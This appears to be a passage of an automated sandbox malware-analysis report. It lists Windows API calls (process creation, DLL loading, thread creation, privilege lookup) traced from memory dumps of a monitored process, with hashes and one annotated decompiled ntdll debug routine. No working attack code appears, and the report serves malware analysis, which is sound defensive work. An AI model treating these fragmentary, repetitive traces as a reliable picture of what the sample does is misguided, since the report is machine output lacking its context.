• API String ID: 3472027048-1269752229

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00393B93), ref: 003A84ED
Strings
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00393B93), ref: 003A84ED
Strings
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003972BA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003972DB
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00399B82
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003A8584
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003A8584
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003A8584
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0039CCC0,?,?), ref: 003A703C
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0039CF92,0039CF92,?,00000000,?,?), ref: 003A8650
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0039CCC0,?,?), ref: 003A703C
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

APIs
• RtlAllocateHeap.NTDLL(003A3506,?,003A3C7F,003A3C7F,?,003A3506,?,?,?,?,?,00000000,00000000,?), ref: 003A84AD
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0039CF92,0039CF92,?,00000000,?,?), ref: 003A8650
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,00397C63,?), ref: 0039D42B
Memory Dump Source
• Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
                                                                    • Opcode ID: b3fa86073e4f7c890201e0e84b38854a440118736aa9edb98764bfc91aa5b8b0
                                                                    • Instruction ID: 6d717dd22a96a2934e3ad54f30a5470c420457a79803751996646e4cde35ceb8
                                                                    • Opcode Fuzzy Hash: b3fa86073e4f7c890201e0e84b38854a440118736aa9edb98764bfc91aa5b8b0
                                                                    • Instruction Fuzzy Hash: 1ED0C2B67902003EEB14EBE09C57F16618D9751304F09006CF5459A2C3D954D0048220
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00397C63,?), ref: 0039D42B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction ID: 8619672caa1b5cb277784dd841e312b2cf80849cf6e1b845f199a99d6a339dfb
                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                    • Instruction Fuzzy Hash: 78D0A7727903043BEA10FAE49C03F2672CD9B45B00F494064FA48DB3C3ED60F5004161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d535db925a4d7361a12089fdf0a2c712f3ebd9977844f00d0646216a63ef7003
                                                                    • Instruction ID: b8dd820d404cd40c2991741faf99a61c453cf6f900f57203b5b44003962906fb
                                                                    • Opcode Fuzzy Hash: d535db925a4d7361a12089fdf0a2c712f3ebd9977844f00d0646216a63ef7003
                                                                    • Instruction Fuzzy Hash: 03B09B719414D5C5D611D7A05A087177D0477D0745F16D561D1020645B477CC0D1F5B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 53%
                                                                    			// Decompiler output as recorded by the sandbox; comments added for orientation.
                                                                    			// Shape matches the ntdll critical-section timeout reporting path: __edx points at
                                                                    			// the 64-bit wait timeout, _a4 is the RTL_CRITICAL_SECTION being waited on.
                                                                    			E02E5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];                       // TEB self pointer (x86)
                                                                    				_t15 = _t12;                              // critical section pointer
                                                                    				// 0xFFFFFFFFFF676980 == -10,000,000 (100 ns units), i.e. one second;
                                                                    				// E02E0CE00 converts the relative timeout into whole seconds
                                                                    				_t7 = E02E0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				// E02E55720 is the debug-print helper (component id 0x65, level 1)
                                                                    				E02E55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;                             // RTL_CRITICAL_SECTION.DebugInfo
                                                                    				if(_t9 == 0xffffffff) {                   // -1 means no debug info attached
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));      // RTL_CRITICAL_SECTION_DEBUG.ContentionCount
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));       // RTL_CRITICAL_SECTION.OwningThread
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));      // TEB.ClientId.UniqueThread
                                                                    				return E02E55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));   // TEB.ClientId.UniqueProcess
                                                                    			}

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E5FDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E5FE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E5FE2B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 73023edd5b640cc8358d67c826b635191487c9404bc9fbe8758efc0d67c3c7ae
                                                                    • Instruction ID: a5fe2f2e93d0aea914572e3b9c762fc820b290ad35232beded495038a51de873
                                                                    • Opcode Fuzzy Hash: 73023edd5b640cc8358d67c826b635191487c9404bc9fbe8758efc0d67c3c7ae
                                                                    • Instruction Fuzzy Hash: 9DF0F632280211BFE6211A55DC06F63BF6BEB45730F249315FA29565D1DEA2FC60C6F4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%